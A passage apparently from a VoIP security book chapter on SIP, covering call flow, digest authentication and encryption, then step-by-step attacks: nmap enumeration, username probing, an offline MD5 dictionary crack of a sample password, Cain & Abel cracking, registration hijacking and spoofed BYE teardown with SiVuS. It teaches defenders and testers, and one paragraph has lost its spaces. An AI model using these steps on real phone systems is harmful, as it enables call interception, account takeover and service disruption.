Route: <sip:Kusum@192.186.5.120>
From: Sonia <sip:Sonia@Aum.com>;tag=110806
To: Kusum <sip:Kusum@Om.com>;tag=1117706
Call-ID: 2006110800
CSeq: 1 ACK
Content-Length: 0

9. RTP packets are then exchanged (on the media layer, not the session layer). RTP is the protocol that actually transfers the audio (media) for each phone, but SIP is used to set up the session. Both protocols work together for the entire VoIP session. (RTP is discussed in detail in Chapter 4.)

10. Once the phone call is complete, Sonia can terminate the call by sending a BYE message to Kusum.

BYE sip:Kusum@Om.com SIP/2.0
Via: SIP/2.0/UDP 10.20.30.41:5060
To: Kusum <sip:Kusum@Om.com>;tag=1117706
From: Sonia <sip:Sonia@Aum.com>;tag=110806
Call-ID: 2006110800
CSeq: 1 BYE
Content-Length: 0

11. Kusum accepts the termination of the call and sends an OK message to Sonia.

SIP/2.0 200 OK
To: Kusum <sip:Kusum@Om.com>;tag=1117706
From: Sonia <sip:Sonia@Aum.com>;tag=110806
Call-ID: 2006110800
CSeq: 1 BYE
Content-Length: 0
Enumeration and Registration

Network port scanners can be used to enumerate SIP User Agents, Registrars, Proxy servers, and other SIP-enabled systems. SIP usually listens on TCP or UDP port 5060.

Note ✎

Other protocols required for VoIP calls, such as RTP, listen on static/dynamic ports other than port 5060. While port 5060 is used to set up the session using SIP, the actual media transmission uses other ports.

Enumerating SIP Devices on a Network

Here's how to enumerate SIP devices on a network, step by step:

1. Download Nmap from http://insecure.org/nmap/.

2. Enter nmap on the command line (Windows) or shell (Unix) to retrieve the syntax of the tool.

3. Enter the following nmap command on the command line/shell to enumerate SIP User Agents and other intermediate devices.

nmap.exe -sU -p 5060 [IP address range]

4. Or, for a class B network address range on a 172.16.0.0 network, enter:

nmap.exe -sU -p 5060 172.16.0.0/16

5. Each IP address that shows open for the STATE (as shown in Figure 2-2) is probably a SIP device. As you can see in Figure 2-2, the addresses 172.16.1.109 and 172.16.1.244 are probably SIP devices.

Figure 2-2. Enumerating SIP entities
Registering with Identified SIP Devices

Once SIP devices have been identified on the network, one can attempt to register with them using a SIP User Agent. Additionally, because authentication is often disabled or enabled using weak passwords, such as the telephone number of the phone, this process can be rather easy. (I'll discuss breaking authentication later in this chapter.) Once a SIP User Agent registers with a Registrar, all available SIP information on the network, such as other SIP User Agents, can be enumerated. If authentication has been disabled on the device, anonymous unauthorized users may be able to find all SIP entities on the network. This information can be used to target specific phones on the VoIP network. Complete the following exercise to register a SIP User Agent with a SIP Registrar.

1. Download, install, and run a SIP User Agent, such as X-Lite from http://www.xten.com/index.php?menu=download/.

2. Download, install, and run a PBX server running SIP, such as Asterisk. You can download a pre-configured version of Asterisk from http://www.vmware.com/vmtn/appliances/directory/302/ that runs under VMware Player.

3. Download the pre-configured SIP.conf file from http://labs.isecpartners.com/HackingVoIP/HackingVoIP.html/

4. Copy sip.conf to /etc/asterisk on the VoIP VMware appliance.

5. Start X-Lite and right-click its main interface.

6. Select SIP Account Settings.

7. Select Add and enter the following information for each field:
a. Username: Sonia
b. Password: HackmeAmadeus
c. Domain: IP address of the VoIPonCD VMware appliance

8. Check Register with domain and receive incoming calls.

9. Select the Target Domain radio button.

10. Select OK and Close.

You're done! You have now registered to a SIP server using the SIP User Agent.
Authentication

SIP uses digest authentication for user validation, which is a challenge/response method.[1] The authentication process is largely based on HTTP digest authentication, with a few minor tweaks. When User Agents submit a SIP REGISTER or INVITE method to a server that requires authentication, a 401 or 407 error message is automatically sent by the server, indicating that authentication is required. Within the 401 or 407 response, there will be a challenge (nonce). The challenge is used in the digest authentication process that will eventually be submitted by the User Agent. Specifically, the User Agent must include the following entities in its response:

Username: The username used by the SIP User Agent (e.g., Sonia)
Realm: The associated domain for the session (e.g., isecpartners.com)
Password: The password used by the SIP User Agent (e.g., HackmeAmadeus)
Method: SIP method used during the session, such as INVITE and REGISTER
URI: The Uniform Resource Identifier for the User Agent, such as SIP:192.168.2.102
Challenge (nonce): The unique challenge provided by the server in the 401 or 407 response
Cnonce: The client nonce. This value is optional, unless Quality of Service information is sent by the server, and usually the value is absent.
Nonce Count (nc): The number of times a client has sent a nonce value; this value is optional and is usually absent.
The following steps outline the process of a SIP User Agent's authenticating to a SIP server using digest authentication:

1. A SIP User Agent sends a request for communication (via a REGISTER, INVITE, or some other SIP method).

2. The server (e.g., Registrar or SIP Proxy server) responds with either a 401 or 407 unauthorized response, which contains the challenge (nonce) to be used for the authentication process.

3. The SIP User Agent performs three actions in order to send the correct MD5 response back to the server, which will prove that it has the correct password. The first step is to create a hash consisting of its username, realm, and password information, according to the following syntax:

MD5(Username:Realm:Password)

4. For the second action, the User Agent creates a second MD5 hash consisting of the SIP method being used, such as REGISTER, and the URI, such as SIP:192.168.2.102, according to the following syntax:

MD5(Method:URI)

5. For the last action, the SIP User Agent creates an MD5 hash to be used for the final response. This hash combines the first MD5 hash in step 3, the challenge (nonce) from the server from the 401/407 packet, the nonce count (if one has been sent), cnonce (if one has been sent), and the second MD5 hash from step 4, as follows:

MD5(MD5-step-3:nonce:nc:cnonce:MD5-step-4)

The nc and cnonce are optional, so the equation could also be:

MD5(MD5-step-3:nonce:MD5-step-4)

6. The client sends the final MD5 hash created in step 5 to the server as its "response" value.

7. The server performs the same exercise as the user did in steps 3, 4, and 5. If the response from the User Agent matches the MD5 hash value created by the server, the server can then confirm that the password is correct, and the user will be authenticated.

An example authentication process between a SIP User Agent and a SIP server is shown in Figure 2-3 (a digest challenge from the SIP server) and Figure 2-4 (the authentication response from the SIP User Agent).

Figure 2-3. Digest challenge from SIP server

Figure 2-4. Authentication response from SIP User Agent

Notice in Figure 2-3 that the challenge (nonce) value is 350c0fec and that the realm is isecpartners.com. In Figure 2-4 the username is Sonia, and the URI is SIP:192.168.2.102. Based on this information, and according to steps 1 through 7, the response calculated by the User Agent would be:

1. MD5(Sonia:isecpartners.com:HackmeAmadeus) = 49be40838a87b1cb0731e35c41c06e04
2. MD5(REGISTER:sip:192.168.2.102) = 92102b6a8c0f764eeb1f97cbe6e67f21
3. MD5(49be40838a87b1cb0731e35c41c06e04:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21) = 717c51dadcad97100d8e36201ff11147 (Final Response Value)
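The following is an added example (not the book's SIP.Tastic or any code from the book): steps 3 to 5 computed by a client, the Authorization header of RFC 3261 section 22.4 built from them, and the server-side check of step 7, including the optional nc/cnonce (qop=auth) form, which per RFC 2617 also folds the qop token into the final hash. Function names are the example's own; the cnonce is a constructed value, and running the block with the chapter's values prints a response to compare with the worked example above.

```python
"""Added example, not from the book: the digest computation of steps 3 to 5 and the
server-side verification of step 7, with the Authorization header syntax of RFC 3261
section 22.4. Sample values are the chapter's (Sonia, isecpartners.com, nonce 350c0fec);
the cnonce used in the qop=auth form is a constructed value."""
import hashlib
import hmac
import re

PARAM_RE = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')  # name="quoted" or name=token


def md5_hex(*parts):
    """MD5 of the colon-joined parts, as 32 lowercase hex characters."""
    return hashlib.md5(":".join(parts).encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce, qop=None, nc=None, cnonce=None):
    """Step 3: MD5-1 = MD5(user:realm:password); step 4: MD5-2 = MD5(method:uri);
    step 5: MD5(MD5-1:nonce:MD5-2), or with qop=auth MD5(MD5-1:nonce:nc:cnonce:qop:MD5-2).
    (RFC 2617 includes the qop token itself in the qop form; the chapter's formula omits it.)"""
    md5_1 = md5_hex(username, realm, password)
    md5_2 = md5_hex(method, uri)
    if qop is None:
        return md5_hex(md5_1, nonce, md5_2)
    return md5_hex(md5_1, nonce, nc, cnonce, qop, md5_2)


def parse_digest(header_value):
    """Parse a 'Digest k="v", k=v, ...' header value (WWW-Authenticate, Proxy-Authenticate,
    Authorization or Proxy-Authorization) into a dict of its parameters."""
    scheme, _, params = header_value.strip().partition(" ")
    if scheme.lower() != "digest":
        raise ValueError("not a Digest header")
    return {name: quoted or token for name, quoted, token in PARAM_RE.findall(params)}


def build_authorization(username, realm, password, method, uri, nonce, qop=None):
    """Client side (step 6): the Authorization header value the User Agent sends back."""
    fields = [f'username="{username}"', f'realm="{realm}"', f'nonce="{nonce}"', f'uri="{uri}"']
    nc = cnonce = None
    if qop:
        nc, cnonce = "00000001", "0a4f113b"  # nonce count and a constructed client nonce
        fields += [f"qop={qop}", f"nc={nc}", f'cnonce="{cnonce}"']
    response = digest_response(username, realm, password, method, uri, nonce, qop, nc, cnonce)
    return "Digest " + ", ".join(fields + [f'response="{response}"'])


def verify_authorization(header_value, method, issued_nonce, lookup_password):
    """Server side (step 7): recompute the response from the stored password and compare.
    The nonce must be the one this server issued for the transaction, so a response
    captured under an old challenge cannot be replayed against a fresh one."""
    p = parse_digest(header_value)
    if p.get("nonce") != issued_nonce or "uri" not in p:
        return False
    if p.get("qop") and not (p.get("nc") and p.get("cnonce")):
        return False  # qop form announced but its mandatory parameters are missing
    password = lookup_password(p.get("username"), p.get("realm"))
    if password is None:
        return False
    expected = digest_response(p["username"], p["realm"], password, method, p["uri"],
                               issued_nonce, p.get("qop"), p.get("nc"), p.get("cnonce"))
    return hmac.compare_digest(expected, p.get("response", ""))


if __name__ == "__main__":
    users = {("Sonia", "isecpartners.com"): "HackmeAmadeus"}
    nonce = "350c0fec"  # the challenge value shown in Figure 2-3
    auth = build_authorization("Sonia", "isecpartners.com", "HackmeAmadeus",
                               "REGISTER", "sip:192.168.2.102", nonce)
    print("Authorization:", auth)
    print("accepted:", verify_authorization(auth, "REGISTER", nonce, lambda u, r: users.get((u, r))))
```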
Encryption

Like many other protocols, SIP does not offer encryption natively. However, it's important to use encryption at the signaling layer in order to protect sensitive information traversing the network, such as passwords and sequence numbers. Similar to the HTTP protocol, TLS (Transport Layer Security, successor to SSLv3) can be used to secure SIP. TLS can provide confidentiality and integrity protection for SIP, protecting it against many of the security attacks discussed later in this chapter. In the following section, we will discuss how TLS and S/MIME can be used to secure SIP; however, as of this writing, the implementation is not widely supported.

SIP with TLS

Using TLS with SIP (SIPS) is quite similar to using TLS on HTTP (HTTPS). Here's how it works:

1. A User Agent sends a message to a server and requests a TLS session.

2. The server responds to the User Agent with a public certificate.

3. The User Agent verifies the validity of the certificate.

4. The server and User Agent exchange session keys to be used for encrypting and decrypting information sent along the secure channel.

5. At this point, the server contacts the next hop along the route for the SIP User Agent to ensure that communication from hop 2 to hop 3 (and so forth) is also encrypted, which ensures hop-to-hop encryption between the SIP User Agents and all intermediate servers and devices.

Figure 2-5 illustrates a VoIP call using SIP with TLS security.

Figure 2-5. Sample SIP communication with TLS

Here's what's happening in Figure 2-5:

1. SIP User Agent requests TLS security with the SIP Proxy server number 1.

2. SIP Proxy server 1 sends its public certificate to the SIP User Agent.

3. SIP User Agent verifies the validity of the certificate.

4. SIP Proxy server 1 and SIP User Agent exchange session keys, enabling encryption between them.

5. SIP Proxy server 1 contacts SIP Proxy server 2 to encrypt hop number 2.

6. Steps 1 through 4 are repeated between both Proxy servers.

7. Step 5 is repeated between each hop on the requested communication channel.
SIP with S/MIME

In addition to TLS, S/MIME (Secure/Multipurpose Internet Mail Extensions) can also be used for securing the bodies of SIP messages. S/MIME can provide integrity and confidentiality protection to SIP communication; however, it is considerably more difficult to implement than TLS. Because SIP messages carry MIME bodies (audio), S/MIME can be used to secure all content of messages sent to and from another User Agent. SIP headers, however, remain in the clear. In order to deploy S/MIME, each User Agent must contain an identifying certificate with public and private keys, which are used to sign and/or encrypt message information in SIP packets. For example, if user Sonia wants to send a SIP packet with S/MIME to user Kusum, she would encrypt the body of the SIP packet with Kusum's public key. Both Sonia and Kusum must also have a keyring that contains each other's certificates and public keys in order for each to read the encrypted message. This implementation is similar to Pretty Good Privacy (PGP), wherein a sender encrypts a message with the receiver's public key. Because the receiver's private key is the only key that can be used to retrieve information encrypted with the receiver's public key, data is safe despite the use of public networks for transfer. Therefore, users are often forced to use self-signed certificates that offer very little protection because they can easily be faked. While it is possible to distribute certificates within the SIP packet itself, without a central authority there is not a good method for a User Agent to verify that the certificate received is actually associated with the sender of the SIP packet.

[1] See Section 22.4 in the SIP RFC 3261 for digest authentication information.
SIP Security Attacks

Now that we know the basics of SIP authentication and encryption, let's discuss some of the security attacks. It is no secret that SIP has several security vulnerabilities; some are documented in the RFC itself, and a simple web search for VoIP security issue will return several hits that involve SIP security weaknesses. While an entire book could be devoted to SIP security attacks, we'll focus on VoIP attacks on devices using SIP for the session setup. We'll cover a few of the more popular attacks in the most critical attack classes, namely:

Username enumeration
SIP password cracking (dictionary attack)
Man-in-the-middle attack
Registration hijacking
Spoofing Registrars and Proxy servers
Denial of Service, including BYE, REGISTER, and un-register

Username Enumeration

Username enumeration involves gaining information about valid accounts registered on the VoIP network by using error messages from SIP Proxy servers and Registrars or by sniffing. Similar to any security attack, information leakage is often the first 80 percent of the process. The more information leaked by a target, the more likely an attacker is to succeed. Therefore, enumerating usernames is often the first step of an attack.

Enumerating SIP Usernames with Error Messages

SIP usernames can be enumerated via error messages sent by SIP Proxy servers and/or Registrars. If a User Agent sends a REGISTER or INVITE request with a valid username, a 401 response is received. However, if a REGISTER or INVITE request is sent with an invalid username, a 403 response is received. An attacker can simply brute-force the process by sending out hundreds of REGISTER packets with different username values. For each request that responds with a 401 value, the attacker will know that he or she has uncovered a valid username. Complete the following steps to enumerate SIP usernames via an error message response:

1. Download and install SiVuS from http://www.vopsecurity.org/.

2. Under the SIP tab, select Utilities ► Message Generator.

3. Items a through j in the following list should be entered into the SiVuS SIP Message Generator tab. In the SIP Message section of SiVuS, enter the correct values for the local VoIP network, where Domain would be the Proxy server or Registrar. For example, items in italic should be customized to the specific local environment. In order to enumerate usernames, change the username in step c below to the username you wish to enumerate. Our first request will try to determine if the username Sonia exists on the 192.168.2.102 domain.
a. Method: REGISTER
b. Transport: UDP
c. Called User: Sonia
d. Domain: 192.168.2.102
e. Via: SIP/2.0/TCP 192.168.5.102
f. To: Sonia <sip:Sonia@192.168.2.102>
g. From: Attacker <sip:Attacker@192.168.2.102>
h. From Tag: ff761a48
i. Call-ID: 845b1f52dd197838MThmMDVhZWRkYZIxMmI1MjNiNDA4MThmYTJiODdiMzM
j. Cseq: 1 REGISTER

If the SIP Proxy server or Registrar returns a 401 response packet, the user Sonia has just been enumerated. If not, the user Sonia is not used on this VoIP network.

Enumerating SIP Usernames by Sniffing the Network

When authentication is required between a User Agent and SIP server, the URI is sent from the User Agent to the server. Unless some sort of transport encryption has been used between the User Agent and the authenticating server, such as TLS, the URI traverses the network in cleartext. Hence, the URI standard of SIP:User@hostname:port can simply be sniffed by an attacker on the network.

Warning ☠

A switched network provides little protection, as an attacker can perform an ARP poisoning man-in-the-middle attack and capture all the SIP URIs within the local subnet.

The use of cleartext usernames places more pressure on the security of the client's password, because the username is given away freely. Furthermore, a malicious user can attempt several attacks once the username is captured, such as a brute-force attack. Additionally, because enterprises often use usernames or phone extensions as passwords, if an attacker can easily obtain a username or phone extension, the User Agent could be easily compromised.

Figure 2-6 shows an example of a sniffed username over the network using Wireshark. In order to view the SIP username in Wireshark, one would simply navigate to the SIP section of the packet, expand the Message Header section, and view the To, From, and Contact fields. These fields show the User Agent's username in cleartext.

Note ✎

Another tool, called Cain & Abel, can also be used to enumerate usernames, as shown later in the chapter.

Figure 2-6. SIP username in Wireshark
SIP Password Retrieval

Now that we know how to easily retrieve the username of SIP User Agents, let's attempt to get the password. SIP's authentication process uses digest authentication. As discussed in "SIP Basics" earlier in this chapter, this model ensures that the password is not sent in cleartext; however, the model is not immune to basic offline dictionary attacks. The SIP User Agent uses the following equations to create the MD5 response value used to authenticate the endpoint to the server (items in italic traverse the network in cleartext). Notice that the only item that is not exposed to a passive anonymous machine on the network is the password, which means that it is vulnerable to an offline dictionary attack. A dictionary attack consists of submitting a dictionary of words against a given hash algorithm to deduce the correct password. An offline version of the dictionary attack is performed off the system, such as on an attacker's laptop:

MD5-1 = MD5(Username:Realm:Password)
MD5-2 = MD5(Method:URI)
Response MD5 Value = MD5(MD5-1:Nonce:MD5-2)

In order to perform an offline dictionary attack, the attacker must first sniff the username, realm, method, URI, nonce, and the MD5 Response hash over the network (using a man-in-the-middle attack on the entire subnet), which are all available in cleartext. Once this information is obtained, the attacker takes a dictionary list of passwords and inserts each one into the above equation, along with all the other items that have already been captured. Once this occurs, the attacker will have all the information to perform the offline dictionary attack. Furthermore, because SIP User Agents often use simple passwords, such as a four-digit phone extension, the time required to gain the password can be minimal.
Data Collection for SIP Authentication Attacks

The information needed to perform an offline dictionary attack is available to a passive attacker from two packets by sniffing the network, including the challenge packet from the SIP server and the response packet sent by the User Agent. The packet sent from the SIP server contains the challenge and realm in cleartext. The packet from the User Agent contains the username, method, and URI in cleartext. Once the attacker has sniffed all the values to create the password, she takes a password from her dictionary and concatenates it with the known username and realm values to create the first MD5 hash value. Next, she takes the method and URI sniffed over the network to create the second MD5 hash value. Once the two hashes are generated, she concatenates the first MD5, the nonce sniffed over the network, and the second MD5 hash value to create the final response MD5 value. If the resulting MD5 hash value matches the response MD5 hash value sniffed over the network, the attacker knows that she has guessed (brute-forced) the correct password. If the MD5 hash values are not correct, she repeats the process with a new password from her dictionary until she receives a hash value that matches the hash value captured over the network.

Note ✎

Unlike an online brute-force attack where the attacker may have only three attempts before she is locked out or noticed on the network, the attacker can perform this test offline indefinitely until she has cracked the password. Furthermore, for SIP hard phones and soft phones with easy or basic passwords, the exercise will not take very long.

An Example

Let's walk through an example. Figure 2-3 shows the challenge packet from a SIP server. From this packet, an attacker can obtain the following information:

Challenge (nonce): 350c0fec
Realm: isecpartners.com

The response packet from a SIP User Agent is shown in Figure 2-4. From this packet, an attacker can obtain the following information:

Username: Sonia
Method: REGISTER
URI: SIP:192.168.2.102
MD5 Response Hash Value: 717c51dadcad97100d8e36201ff11147
Using the digest authentication equation outlined previously, and bolding all items we have sniffed over the network, our equations would now look like:

Setup Equation 1, MD5-1: MD5(Sonia:isecpartners.com:Password)
Setup Equation 2, MD5-2: MD5(REGISTER:sip:192.168.2.102)
Final Equation 3: 717c51dadcad97100d8e36201ff11147 = (MD5-1:350c0fec:MD5-2)

Equation 1 is unknown, because the password is not sent over the network in cleartext. Equation 2 is completely known, because the method and URI are in cleartext. The MD5 hash value for Equation 2 turns out to be 92102b6a8c0f764eeb1f97cbe6e67f21. Equation 3 is the combination of the MD5 hash value from Equation 1, the nonce from the SIP server, and the MD5 hash value from Equation 2. Because the nonce from the SIP server has been sniffed over the network and the MD5 hash value of Equation 2 can be generated, the MD5 hash value from Equation 1 is the only unknown entity to brute-force. To perform the dictionary attack, two procedures are needed. The first procedure will require the attacker to take Equation 1 and insert dictionary words in the password field, as shown in bold in the following example:
MD5-1: MD5(Sonia:isecpartners.com:Password)
f3ef32953eb0a515ee00916978a04eac: MD5(Sonia:isecpartners.com:Hello)
44032ae134b07cee2e519f6518532bea: MD5(Sonia:isecpartners.com:My)
08e07c4feffe79e208a68315e9050fe4: MD5(Sonia:isecpartners.com:Voice)
b7e9d8301b12a8c30f8cab6ed32bd0b6: MD5(Sonia:isecpartners.com:Is)
44032ae134b07cee2e519f6518532bea: MD5(Sonia:isecpartners.com:My)
56a88ae72cff2c503841006d63a5ee98: MD5(Sonia:isecpartners.com:Passport)
7b925e7f71e32e0e8301898da182c944: MD5(Sonia:isecpartners.com:Verify)
a5d8761336f52fc74922753989f579c4: MD5(Sonia:isecpartners.com:Me)
49be40838a87b1cb0731e35c41c06e04: MD5(Sonia:isecpartners.com:HackmeAmadeus)

Based on these MD5 hash values from Equation 1, the MD5 hash from Equation 2 (92102b6a8c0f764eeb1f97cbe6e67f21), and the nonce value from Equation 3 (350c0fec), the attacker can now execute the second procedure, which is brute-forcing Equation 3 shown earlier. Notice that we are inserting a different MD5-1 value, which is generated from each unique password we are trying to brute-force, but keeping the same nonce and MD5-2 values in the following equation:

MD5 = (MD5-1:350c0fec:MD5-2)
bba91fc34976257bb5aa47aeca831e8e = (f3ef32953eb0a515ee00916978a04eac:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)
01d0e5f7c084cbf9e028758280ffc587 = (44032ae134b07cee2e519f6518532bea:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)
5619e7d8716de9c970e4f24301b2d88e = (08e07c4feffe79e208a68315e9050fe4:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)
8672c6c38c335ef8c80e7ae45b5122f8 = (b7e9d8301b12a8c30f8cab6ed32bd0b6:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)
01d0e5f7c084cbf9e028758280ffc587 = (44032ae134b07cee2e519f6518532bea:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)
913408579b0beb3b6a70e7cc2b8688f9 = (56a88ae72cff2c503841006d63a5ee98:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)
b8178e3e6643f9ff7fc8db2027524494 = (7b925e7f71e32e0e8301898da182c944:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)
c4ee4ed95758d5e6f6603c26665f4632 = (a5d8761336f52fc74922753989f579c4:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)
717c51dadcad97100d8e36201ff11147 = (49be40838a87b1cb0731e35c41c06e04:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)

The final password attempt in the previous example yields an MD5 hash value of 717c51dadcad97100d8e36201ff11147, which is the same MD5 hash value the attacker sniffed over the network (shown in the second to last line in Figure 2-4). This tells the attacker that the word HackmeAmadeus is the SIP User Agent's password!
Tools to Perform the Attack

This attack amplifies the importance of a strong password—ideally, one that cannot be brute-forced easily when using digest authentication. I have written a tool that can perform this previous exercise automatically (along with a captured SIP authentication session from Wireshark or your favorite sniffer). The tool takes a list of passwords that an end user would like to test, concatenates it with the required information sniffed over the network (from Wireshark), and determines if the resulting MD5 hash value matches the hash value that was also sniffed over the network. For a copy of the tool, called SIP.Tastic.exe, visit http://www.isecpartners.com/tools.html/. A screenshot of the tool is in Figure 2-7.

Figure 2-7. SIP password testing

One could also perform the same attack (without Wireshark or SIP.Tastic) using Cain & Abel (http://www.oxid.it/cain.html/). Cain & Abel can perform a man-in-the-middle attack, sniff the SIP authentication process between a SIP User Agent and SIP server, and attempt to crack the password. Furthermore, one could perform an active dictionary attack on SIP using vnak (http://www.isecpartners.com/tools.html/), which would change the attack from an offline dictionary attack to a pre-computed dictionary attack. Here's how you would gain access to a SIP password using Cain & Abel:

1. Enable the sniffer and/or perform a man-in-the-middle attack with Cain & Abel.

2. Once sniffing or a man-in-the-middle attack has begun, select the Sniffer tab at the top of the Cain & Abel program and then the Passwords tab at the bottom of the program.

3. Once the Passwords tab has been selected, highlight SIP in the left-hand column as shown in Figure 2-8.

Figure 2-8. SIP information from Cain & Abel

4. As SIP authentication requests are sniffed over the wire, select a request to crack, right-click, and select Send to Cracker.

5. Select the Cracker tab at the top of the program.

6. Highlight a row that has the SIP authentication information sniffed over the network.

7. Right-click the highlighted row and select Dictionary attack ► Add to add a library to perform the dictionary attack with, such as isec.dict.txt.

8. Once the dictionary has been selected, select Start and wait for Cain & Abel to crack the password.

You're done!

Note ✎

Cain can also perform a brute-force attack if you select Brute-force in step 7 instead of Dictionary attack.
Man-in-the-Middle Attack

In addition to an offline dictionary attack, SIP is also vulnerable to a man-in-the-middle attack, as shown in Figure 2-9. This attack uses ARP cache poisoning or DNS spoofing techniques to allow the attacker to get between a SIP server and the legitimate SIP User Agent. Once the attacker is routing traffic between the two legitimate entities, he can perform a man-in-the-middle attack and authenticate to the SIP server without knowing a valid username and password. Authenticating to the SIP server significantly increases the attack surface of a SIP implementation. During the attack, as shown in Figure 2-9, the attacker monitors the network to identify when SIP User Agents send authentication requests to the SIP server. When the authentication request occurs (step 1), he intercepts the packets and prevents them from reaching the real SIP server. He then sends his own authentication request to the SIP server (step 2). Using the challenge/response method for authentication, the SIP server sends a nonce to the attacker (step 3). The attacker receives the nonce and then sends the same nonce to the legitimate User Agent, who was attempting to authenticate originally (step 4). The legitimate User Agent then sends the attacker a valid MD5 hash value that is derived from the real password and the SIP server's nonce (step 5), thinking the attacker is the actual SIP server. Once the attacker has the valid MD5 digest hash value from the legitimate User Agent, he sends the hash on behalf of himself to the SIP server and successfully authenticates (step 6).

Figure 2-9. Man-in-the-middle attack with SIP authentication
Registration Hijacking

Registration hijacking uses a dated attack class but still works in many new technologies such as VoIP. The attack takes advantage of a User Agent's ability to modify the Contact field in the SIP header.

Note ✎

Spoofing the identity of a user is nothing new; attackers have been spoofing emails in SMTP mail messages for many years. The same idea applies to SIP REGISTER or INVITE messages, where a user can modify the Contact field in the SIP header and claim to be another User Agent.

When a User Agent registers with a SIP Registrar, many things are registered, including the User Agent's point of contact information. The point of contact information, listed in the Contact field in the SIP header, contains the IP address of the User Agent. This information allows SIP Proxy servers to forward INVITE requests to the correct hard phone or soft phone via the IP address. For example, if Sonia wanted to talk to Kusum, the Proxy servers in both networks would have to have the contact information in order to locate each of them. Figure 2-10 shows a sample registration request from the SIP User Agent called Sonia (notice the Contact field for the user).

Figure 2-10. SIP registration request

In Figure 2-10, there are no cryptographic protections in the SIP REGISTER request. This opens the door for attackers to spoof the registration request and hijack the identities of SIP User Agents. In order to hijack the registration of a SIP User Agent, an attacker can submit the same registration request packet shown previously but modify the Contact field in the SIP header and insert her own IP address. For example, if an attacker named Raina wanted to hijack the registration of a user called Sonia, she would replace the Contact field, which contains Sonia's IP address of 192.168.5.122, with her own, which is 192.168.5.126. Raina would then spoof a REGISTER request with her IP address instead of Sonia's, as shown in Figure 2-11 (notice that the From field still says Sonia@192.168.2.101, but the Contact field says Raina@192.168.5.126).

Figure 2-11. Spoofed REGISTER packet

The best method of spoofing a SIP message is with the SiVuS tool (http://www.vopsecurity.org/), a VoIP scanner primarily used for SIP-based implementations. Among other things, SiVuS can discover SIP networks, scan SIP devices, and create SIP messages. Its ability to create SIP messages is very useful for the registration-hijacking attack. For example, here's how you could use SiVuS to spoof a registration attack and hijack another user's identity on the SIP network.

1. Open SiVuS.

2. Under the SIP tab, select Utilities ► Message Generator.

3. In the SIP Message section, enter values a through m from the following text. Replace italic text with the correct values from your local network. The values are based on the user Raina's hijacking the registration of the user Sonia (based on the legitimate request in Figure 2-10). Notice step m in italic bold, where Raina inserts her own contact IP address. Sonia's information is listed in steps h and i:
a. Method: REGISTER
b. Transport: UDP
c. Called User: Sonia
d. Domain: 192.168.2.102
e. Port: 49304
f. Via: SIP/2.0/TCP 192.168.5.122
g. Branch: z9hG4bK-d87543-8C197c3ebd1b8855-1-d87543
h. To: Sonia <sip:Sonia@192.168.2.102>
i. From: Sonia <sip:Sonia@192.168.2.102>
j. From Tag: ff761a48
k. Call-ID: 845b1f52dd197838MThmMDVhZWRkYZIxMmI1MjNiNDA4MThmYTJiODdiMzM
l. Cseq: 1 Register
m. Contact: sip:Raina@192.168.5.126

4. Click the Start button. (The configuration information is also shown in Figure 2-12.)

Figure 2-12. Spoofing SIP messages using SiVuS

Before the previous exercise can hijack a session, the attacker needs to take the legitimate user off the network. A good method to do this is by de-registering the legitimate SIP User Agent from the SIP Proxy server, as discussed later in "Denial of Service via BYE Message". Once the hijacking attack message is submitted to the SIP Proxy server, the attacker has successfully hijacked the User Agent's registration.
SpoofingSIPProxyServersandRegistrars
ThenumberofSIPspoofingattacksisquitelarge,includingtheabilitytospoofaresponsefromSIPinfrastructureservers,suchasSIPProxyserversandSIPRegistrars.Duringa
registrationrequest,aSIPUserAgentsendsaSIPProxyorRegistrarserveraREGISTERmessage.AnattackercanthensubmitaforgedresponsefromthedomainandredirecttheUserAgenttoaSIPProxyserverorRegistrarthatshecontrols.Forexample,ifaSIPUserAgenttriedtocontacteNapkin.comwiththecontactaddress172.16.1.100,anattackercouldforgetheresponseforeNapkin.com,butwiththecontactaddressof192.168.1.150,aSIPProxy/Registrarthattheattackercontrols.WhenthelegitimateUserAgentwishestocallusersineNapkin.com,theattackercanredirectthecallstoUserAgentshecontrols,therebyreceivingorrecordingphonecallsthatareintendedforsomeoneelse.
Denial of Service via BYE Message
Similar to H.323 and IAX signaling protocols, SIP is also vulnerable to many Denial of Service (DoS) attacks. The first DoS attack to discuss is simply spoofing a BYE message from one User Agent to another. A BYE message is sent from one user to another to indicate that the user wishes to terminate the call and thus end the session. In normal circumstances, a User Agent would submit a BYE message once the call has been completed. However, an attacker can spoof a BYE message from one user to another and terminate any call in progress. Before this attack can take place, an attacker needs to sniff a few items from an existing conversation between two parties (from an INVITE message or similar), specifically the Call-ID and tag values. After the attacker has captured these entities over the network, he can create a BYE message, forging the From field as one side of the conversation and adding the victim in the To field. Once the From field (which is the attacker's spoofed source address), the To field (which is the victim), the Call-ID value, and tag values are accurate for the call, the attacker can send the packet and the call will be instantly terminated (note that all this information is available over the network in cleartext). Complete the following steps to tear down a SIP session between two entities by using a BYE message:
1. Open SiVuS. (The remainder of the steps are SiVuS-specific.)
2. Under the SIP tab, select Utilities ► Message Generator.
3. In the SIP Message section, enter values a through j, replacing items in bold that correspond to your local network. The values in the example below are based on the attacker Raina's terminating a call between Kusum and Sonia (based on the legitimate request in Figure 2-10):
a. Method: BYE
b. Transport: UDP
c. Called User: Sonia
d. Domain: 192.168.2.102
e. Via: SIP/2.0/TCP 192.168.5.122
f. To: Sonia <sip:Sonia@192.168.2.102>
g. From: Kusum <sip:Kusum@192.168.2.102>
h. From Tag: ff761a48
i. Call-ID: 845b1f52dd197838MThmMDVhZWRkYZIxMmI1MjNiNDA4MThmYTJiODdiMzM
j. Cseq: 2 Bye
4. Select the Start button. (The configuration information is also shown in Figure 2-13.)
Figure 2-13. SIP teardown attack with SiVuS
Notice in the Conversation Log area in Figure 2-13 that the SIP Proxy server returns a 200 OK message to the user, indicating that the spoofed BYE message was successful and the call was terminated. The Conversation Log is also shown below:
